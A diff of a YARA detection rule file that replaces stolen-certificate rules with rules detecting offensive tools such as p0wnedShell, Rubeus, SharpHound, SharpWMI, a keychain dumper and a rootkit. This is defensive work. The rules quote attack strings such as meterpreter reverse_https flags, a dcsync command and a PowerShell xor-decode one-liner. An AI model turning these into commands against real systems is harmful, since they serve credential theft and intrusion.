+rule DITEKSHEN_INDICATOR_TOOL_PWS_Keychaindumper : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects macOS certificate/password keychain dumping tool"
 		author = "ditekSHen"
-		id = "2df4eb66-4890-540f-95e1-fb69eeb32df2"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "cec094fa-c651-58a6-a306-f16d8603e536"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2926-L2937"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L473-L484"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "589ad4939d235138791a98f5d43f6a786ad14345c995ad2e073d3673fb41365a"
+		logic_hash = "f606bdd5dba2180ffc552c46373b52801a0bd65a538b381fb9f4240efc5bd458"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		thumbprint = "98643cef3dc22d0cc730be710c5a30ae25d226c1"
-		importance = 20
+		clamav_sig = "INDICATOR_Osx.Tool.PWS.KeychainDumper"
+
+	strings:
+		$s1 = "_getEmptyKeychainItemString" fullword ascii
+		$s2 = "NdumpKeychainEntitlements" fullword ascii
+		$s3 = "_dumpKeychainEntitlements" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\xAF\\x94\\xE5\\x90\\xBE\\xE8\\xBF\\xAA\\xE5\\x90\\xBE\\xE8\\xBF\\xAA\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE8\\xBF\\xAA\\xE5\\x90\\xBE\\xE5\\x90\\xBE\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE6\\x8F\\x90\\xE4\\xBC\\x8A\\xE6\\xAF\\x94\\xE6\\x8F\\x90\\xE8\\xBF\\xAA\\xE8\\xBF\\xAA\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE4\\xBC\\x8A\\xE6\\x8F\\x90\\xE7\\xBB\\xB4\\xE6\\xAF\\x94" and pe.signatures [ i ] . serial == "e4:14:65:5f:02:53:99:cc:a4:d7:22:5d:89:68:9a:04" )
+		( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf ) and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_64F82Ed8A90F92A940Be2Bb90Fbf6F48 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_P0Wnedshell : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects compiled executables of p0wnedShell post-exploitation toolkit"
 		author = "ditekSHen"
-		id = "70469507-30f1-56be-90bb-1055f7df2496"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "7df8f9b4-48d3-5271-9d60-5dd4bfaed316"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2939-L2950"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L486-L512"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "eacb9d8834bdf618b5aa44bfb37b0b6413f9b4595b6261a948566a63e9855162"
+		logic_hash = "9745b69573bf695fdada122143fb1889a7b2025250b5fb1e8f1a86b3be6f27d3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4d00f5112caf80615852ffe1f4ee72277ed781c3"
-		importance = 20
+
+	strings:
+		$s1 = "Use WinRM, PsExec, SMB/WMI to execute commands on remote systems" wide
+		$s2 = "-CreateProcess \"cmd.exe\" -Username \"nt authority\\system\"" wide
+		$s3 = "-Command '\"lsadump::dcsync /user:" wide
+		$s4 = "-Payload windows/meterpreter/reverse_https -Lhost" wide
+		$s5 = "Get-Content ./EncodedPayload.bat" fullword wide
+		$e1 = "OnYNAB+LCAAAAAAABAC8vOeS60iSLvh75yly+rZZVxuqC4KQs3uvLQhFEJIACALoHVuD1oKQBMbuuy+Y4pw8dUTf3R+bZlWVZHh87uHh4vPItv63ZGrCMW+bF7GZ2zL+" wide
+		$e2 = "kuIeAB+LCAAAAAAABADsvWt327iuMPw9v0Jv27Wa7DqJc2ma5nl71vZFTpzx/ZJL+3TlyLZiq7EtjyTHcffZ//0BSEqiKEqWbKczs8941qS2LgAIAiAIguDjfNp3DHOq" wide
+		$e3 = "mZYIAB+LCAAAAAAABADsvflj2zyOMPx7/gptmnftbBIfuZp0t/OOfMZp7PjO0adfX9lSbCWy5Vp2HGfm+d8/ACQl6vCRNp2Z3bVmnioWSRAEQQAESfC/Pmwp8FTtmTFu" wide
+		$e4 = "u9YGAB+LCAAAAAAABADsvW1D40ayKPw9v0Lr4V7ZE8vY5mUY9rKJBzMTnmWAgyGTvYTlCluAdmzJK9nDsEn++1NV/S61ZJmXZJIN52wG7O7q6urq6qrqquoXSfDveZgE" wide
+		$e5 = "T3gDAB+LCAAAAAAABADtvX1f2zq2KPz3yafQzuZcwi5JEydQ2nM7v4cCnc0zQLmE7j3z6+7NmMQBnwY7YzsFTqff/WpJsi3Jki07DlA2mT008ctaS0tL601L0nThjSPX" wide
+		$e6 = "zRgDAB+LCAAAAAAABADtfW1327jR6OdHv4Kr9TmWdiVZkl+SdZs913Gcrm9tx7WcbvekuS4t0TYbiVRJKYmfbf77xeCNeCVBinKcbNStI5HAYDAYDAaDwczNMhovwjjy" wide
+		$e7 = "pxICAB+LCAAAAAAABADtvf17GkeyKPyz+Cvmlfw+ggRhfcXr1X1znsUIx5yVhC7IUbI+fnUHGKRZwww7M1jWyeZ/v1XV3z09wABysnviZ1cBpqe6urqquqq6uno8j4ZZ" wide
+		$e8 = "H4sIAAAAAAAEANy9e3wTVfo4PG1SmkLbCdpgFdSgUeuCbLTAthYk005gQhNahUIVkCqIqKi1TaAuIGBaJRzG27Kuul5wV3fV1fUuUFxNKbTl3oJAuaiouE4paAGBFpB5" wide
+		$k1 = "EasySystemPPID" fullword ascii
+		$k2 = "EasySystemShell" fullword ascii
+		$k3 = "LatMovement" fullword ascii
+		$k4 = "ListenerURL" fullword ascii
+		$k5 = "MeterStager" fullword ascii
+		$k6 = "PatchEventLog" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Klimate Vision Plus" and pe.signatures [ i ] . serial == "64:f8:2e:d8:a9:0f:92:a9:40:be:2b:b9:0f:bf:6f:48" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or 7 of ( $e* ) or all of ( $k* ) or ( 2 of ( $s* ) and 2 of ( $e* ) and 2 of ( $k* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00F0031491B673Ecdf533D4Ebe4B54697F : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PWS_Rubeus : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Rubeus kerberos defensive/offensive toolset"
 		author = "ditekSHen"
-		id = "ad027dc9-14bc-50dd-b260-7672c528ef9a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "5af8cee0-e664-5dfe-9932-0e74ed41b6b4"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2952-L2963"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L514-L531"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4697ce0a7fcd1fa6ac1dd5246f2a23b85865bef4010280c4ca2e12c433b8ceb2"
+		logic_hash = "ee817d23427970d7e77f9ce2a7cbc25c77177d81354fed83e7551cdcbc2d7cd2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "01e201cce1024237978baccf5b124261aa5edb01"
-		importance = 20
+
+	strings:
+		$s1 = "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" fullword wide
+		$s2 = "(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))" fullword wide
+		$s3 = "rc4opsec" fullword wide
+		$s4 = "pwdlastset" fullword wide
+		$s5 = "LsaEnumerateLogonSessions" fullword ascii
+		$s6 = "extractKerberoastHash" fullword ascii
+		$s7 = "ComputeAllKerberosPasswordHashes" fullword ascii
+		$s8 = "kerberoastDomain" fullword ascii
+		$s9 = "GetUsernamePasswordTGT" fullword ascii
+		$s10 = "WriteUserPasswordToFile" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eebbffbceacddbfaeefaecdbaf" and pe.signatures [ i ] . serial == "00:f0:03:14:91:b6:73:ec:df:53:3d:4e:be:4b:54:69:7f" )
+		uint16( 0 ) == 0x5a4d and 8 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Becd4Ef55Ced54E5Bcde595D872Ae7Eb : FILE
+rule DITEKSHEN_INDICATOR_TOOL_RTK_Hiddenrootkit : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects the Hidden public rootkit"
 		author = "ditekSHen"
-		id = "85835042-a4ab-5cb2-963d-4ef776b740d1"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c9e9d160-224f-505f-a135-56a9793f99c2"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2965-L2976"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L533-L554"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b573853cfb28bdbda37c929834faa15475707684edfe99f14174599faf7b4fb6"
+		logic_hash = "20180fc040c1b988b17b1ca9b61a7dab5180df4961a00f0afcb03e2cbe99b28f"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "72ae9b9a32b4c16b5a94e2b4587bc51a91b27052"
-		importance = 20
+
+	strings:
+		$h1 = "Hid_State" fullword wide
+		$h2 = "Hid_StealthMode" fullword wide
+		$h3 = "Hid_HideFsDirs" fullword wide
+		$h4 = "Hid_HideFsFiles" fullword wide
+		$h5 = "Hid_HideRegKeys" fullword wide
+		$h6 = "Hid_HideRegValues" fullword wide
+		$h7 = "Hid_IgnoredImages" fullword wide
+		$h8 = "Hid_ProtectedImages" fullword wide
+		$s1 = "FLTMGR.SYS" fullword ascii
+		$s2 = "HAL.dll" fullword ascii
+		$s3 = "\\SystemRoot\\System32\\csrss.exe" fullword wide
+		$s4 = "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\%wZ" fullword wide
+		$s5 = "INIT" fullword ascii
+		$s6 = "\\hidden-master\\Debug\\QAssist.pdb" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dedbfdefcac" and pe.signatures [ i ] . serial == "be:cd:4e:f5:5c:ed:54:e5:bc:de:59:5d:87:2a:e7:eb" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $h* ) or 5 of ( $s* ) or ( 2 of ( $s* ) and 2 of ( $h* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_55B5E1Cf84A89C4E023399784B42A268 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_Sharphound : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BloodHound"
 		author = "ditekSHen"
-		id = "de2890d4-3758-5e90-a9af-dc519f0b9e4c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d8f44e15-3e7c-5e5d-9d74-30c61e679fcb"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2978-L2989"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L556-L573"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "37f08db5373cf46da7c0a4a03af21559fdcddb2481f935d5cece55a1fb4abc3c"
+		logic_hash = "bdf10d0aabd6c41e8dd1f87c0fa141f300d785146d059fcd301ec35f65fbe990"
 		score = 75
-		quality = 75
+		quality = 48
 		tags = "FILE"
-		thumbprint = "940345ed6266b67a768296ad49e51bbaa6ee8e97"
-		importance = 20
+
+	strings:
+		$id1 = "InvokeBloodHound" fullword ascii
+		$id2 = "Sharphound" ascii nocase
+		$s1 = "SamServerExecute" fullword ascii
+		$s2 = "get_RemoteDesktopUsers" fullword ascii
+		$s3 = "commandline.dll.compressed" ascii wide
+		$s4 = "operatingsystemservicepack" fullword wide
+		$s5 = "LDAP://" fullword wide
+		$s6 = "wkui1_logon_domain" fullword ascii
+		$s7 = "GpoProps" fullword ascii
+		$s8 = "a517a8de-5834-411d-abda-2d0e1766539c" fullword ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fbbdefaccbbcdc" and pe.signatures [ i ] . serial == "55:b5:e1:cf:84:a8:9c:4e:02:33:99:78:4b:42:a2:68" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $id* ) or 6 of ( $s* ) or ( 1 of ( $id* ) and 4 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_84C3A47B739F1835D35B755D1E6741B5 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_UAC_NSISUAC : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects NSIS UAC plugin"
 		author = "ditekSHen"
-		id = "00fba5a5-b87d-54f7-a5b8-f7b377af2202"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "4a7c20f6-bf0e-55fb-a0b9-7b51e4af7cd3"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2991-L3002"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L575-L587"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6beb0966f2ed981c2e1a859ff9f659a566de867888123c387eeb89a97620345e"
+		logic_hash = "48c0247c789328a0ff62816f5d6ecac7a0f2a3fe2cb95d99c0e7d988147f7137"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8057f20f9f385858416ec3c0bd77394eff595b69"
-		importance = 20
+
+	strings:
+		$s1 = "HideCurrUserOpt" fullword wide
+		$s2 = "/UAC:%X /NCRC%s" fullword wide
+		$s3 = "2MyRunAsStrings" fullword wide
+		$s4 = "CheckElevationEnabled" fullword ascii
+		$s5 = "UAC.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bddbdcfabededdeadbefed" and pe.signatures [ i ] . serial == "84:c3:a4:7b:73:9f:18:35:d3:5b:75:5d:1e:67:41:b5" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_28F6Ca1F249Cfb6Bdb16Bc57Aaf0Bd79 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_REM_Intelliadmin : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects commerical IntelliAdmin remote tool"
 		author = "ditekSHen"
-		id = "b0568efe-d0cc-528d-a9b4-fdb8106c3d0f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "15385e0b-ead4-5614-a04e-55878eb70b34"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3004-L3015"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L589-L602"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c27ad7caa87b366593b82ff5e2b38bda5383e178e2cc01121aaaa5e90beaec86"
+		logic_hash = "8b601d68eff65bc6cc2fb46630a7021e229764f9a80f6d3278ba3b9f55e5b114"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0811c227816282094d5212d3c9116593f70077ab"
-		importance = 20
+
+	strings:
+		$pdb1 = "\\Network Administrator" ascii
+		$pdb2 = "\\Binaries\\Plugins\\Tools\\RPCService.pdb" ascii
+		$s1 = "CIntelliAdminRPC" fullword wide
+		$s2 = "IntelliAdmin RPC Service" fullword wide
+		$s3 = "IntelliAdmin Remote Execute v" ascii
+		$s4 = "IntelliAdminRPC" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cdcafaabbdcaaaeaaee" and pe.signatures [ i ] . serial == "28:f6:ca:1f:24:9c:fb:6b:db:16:bc:57:aa:f0:bd:79" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $pdb* ) or 2 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2C3E87B9D430C2F0B14Fc1152E961F1A : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_Sharpwmi : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SharpWMI"
 		author = "ditekSHen"
-		id = "8e686e58-8fc5-50cf-9259-dcd70f5cc27b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "9c58d9fa-04b8-5a9c-8ae9-ff2e7530772f"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3017-L3028"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L604-L619"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "43a8f2d9055091f930af456abd334e38fb6a98bee3bfb8dcbf84c9563c777101"
+		logic_hash = "e6c5764d0883e2882e06f07e4729362011a4d65614259b85978e1c6ef5cfadb7"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "80daa4ad14fc420d7708f2855e6fab085ca71980"
-		importance = 20
+
+	strings:
+		$s1 = "scriptKillTimeout" fullword ascii
+		$s2 = "RemoteWMIExecuteWithOutput" fullword ascii
+		$s3 = "RemoteWMIFirewall" fullword ascii
+		$s4 = "iex([char[]](@({0})|%{{$_-bxor{1}}}) -join '')" fullword wide
+		$s5 = "\\\\{0}\\root\\subscription" fullword wide
+		$s6 = "_Context##RANDOM##" fullword wide
+		$s7 = "executevbs" fullword wide
+		$s8 = "scriptb64" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Abfaacccde" and pe.signatures [ i ] . serial == "2c:3e:87:b9:d4:30:c2:f0:b1:4f:c1:15:2e:96:1f:1a" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4808C88Ea243Eefa47610D5F5F0D02A2 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_Defendercontrol : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Defender Control"
 		author = "ditekSHen"
-		id = "ea3aadc6-3edd-5e4b-adfe-824103531deb"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "7bc1f26e-2432-5642-b1e7-c87683f7d932"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3030-L3041"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L621-L631"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9fa722bfed0c31e263772615799bbdc054da1424b139c7d73e5755334fb86346"
+		logic_hash = "826ed0643a07580750eb11c4cf2c2759f53b6c2bda51705476edc4808abccbf8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5dc400de1133be3ff17ff09f8a1fd224b3615e5a"
-		importance = 20
+
+	strings:
+		$s1 = "Windows Defender Control" wide
+		$s2 = "www.sordum.org" wide ascii
+		$s3 = "dControl" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bfcdcdfcdfcaaeff" and pe.signatures [ i ] . serial == "48:08:c8:8e:a2:43:ee:fa:47:61:0d:5f:5f:0d:02:a2" )
+		uint16( 0 ) == 0x5a4d and 2 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2F184A6F054Dc9F7C74A63714B14Ce33 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PET_Mulit_Venomagent : FILE
 {
 	meta:
-		description = "Detects executables signed AprelTech Silent Install Builder certificate"
+		description = "Detects Venom Proxy Agent"
 		author = "ditekSHen"
-		id = "17797e5c-acf2-5c4e-b3e0-c48fb7bff996"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "598bc773-cbe9-503b-ba3e-27c2cde8910d"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3043-L3054"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L633-L645"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d14428b81b4ae4a77a517d2148f4b67b45963b71d998139b42ed4e4352fae6a5"
+		logic_hash = "5eda23a237404a44dc9eb057adbf6106166374168eb08e55c182da5c05ecb4f1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ec9c6a537f6d7a0e63a4eb6aeb0df9d5b466cc58"
-		importance = 20
+
+	strings:
+		$s1 = "github.com/Dliv3/Venom/" ascii
+		$s2 = "3HpKQVB3nT3qaNQPT-ZU/SKJ55ofz5TEmg5O3ROWA/CUs_-gfa04tGVO633Z4G/OSeEpRRb0Sq_5R6ArIi-" ascii
+		$s3 = "venom_agent -" ascii
+		$s4 = "bufferssh-userauthtransmitfileunknown portwirep: p->m= != sweepgen" ascii
+		$s5 = "golang.org/x/crypto/ssh.(*handshakeTransport).readPacket"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APREL Tehnologija d.o.o." and pe.signatures [ i ] . serial == "2f:18:4a:6f:05:4d:c9:f7:c7:4a:63:71:4b:14:ce:33" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f or uint16( 0 ) == 0xfacf ) and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ced72Cc75Aa0Ebce09Dc0283076Ce9B1 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_HFS_Webserver : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects HFS Web Server"
 		author = "ditekSHen"
-		id = "7482c8a9-22d7-5ecf-951c-83818e2aeda7"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "2c9d9a38-8a6c-5c53-84bc-4eef77933172"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3056-L3067"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L647-L658"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "47fceb2a79271011bc6feed209ef4021db155dbc0fd4891f0dc1e900f2cb7fdb"
+		logic_hash = "f5b8947e3858466dae5f476790842500f8184c4676d8c0c4870adb7fd3206652"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "db77b48a7f16fecd49029b65f122fa0782b4318f"
-		importance = 20
+
+	strings:
+		$s1 = "SOFTWARE\\Borland\\Delphi\\" ascii
+		$s2 = "C:\\code\\mine\\hfs\\scriptLib.pas" fullword ascii
+		$s3 = "hfs.*;*.htm*;descript.ion;*.comment;*.md5;*.corrupted;*.lnk" ascii
+		$s4 = "Server: HFS" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Valerie LLC" and pe.signatures [ i ] . serial == "00:ce:d7:2c:c7:5a:a0:eb:ce:09:dc:02:83:07:6c:e9:b1" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_C4564802095258281A284809930Dcf43 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_PROX_Lanproxy : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects lanproxy-go-client"
 		author = "ditekSHen"
-		id = "f70f481c-f5cf-5767-9fb0-0adecd0dc1f3"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "71fc23d9-9aae-5666-832b-90cf5a86c474"
+		date = "2024-09-25"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3069-L3080"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L660-L675"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "547613d507b04e3bd944515c77cb6ec161fe008b8e2b43cda574a46cbe2ef5ef"
+		logic_hash = "13a5aaea0fb522e3badb4a60d2db8d7dd46e5721bd6dc2e2b2e29d49e197c375"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "73db2555f20b171ce9502eb6507add9fa53a5bf3"
-		importance = 20
+
+	strings:
+		$s1 = "serverShare" fullword ascii
+		$s2 = "parkingOnChan" fullword ascii
+		$s3 = "{{join .Names \", \"}}{{\"\\t\"}}{{.Usage}}{{end}}{{end}}{{end}}{{end}}{{" ascii
+		$s4 = "</table></thead></tbody>" fullword ascii
+		$s5 = "value=aacute;abreve;addressagrave;alt -> andand;angmsd;angsph;any -> apacir;approx;articleatilde;barvee;barwed;bdoUxXvbecaus;ber" ascii
+		$s6 = "/dev/urandom127.0.0.1:" ascii
+		$s7 = "non-IPv4 addressnon-IPv6 addressntrianglelefteq;object is remotepacer: H_m_prev=reflect mismatchregexp: Compile(remote I/O error" ascii
+		$s8 = ".WithDeadline(.in-addr.arpa." ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cfeaaeedaefddfaaccefcdbae" and pe.signatures [ i ] . serial == "c4:56:48:02:09:52:58:28:1a:28:48:09:93:0d:cf:43" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_3D31Ed3B22867F425Db86Fb532Eb449F : FILE
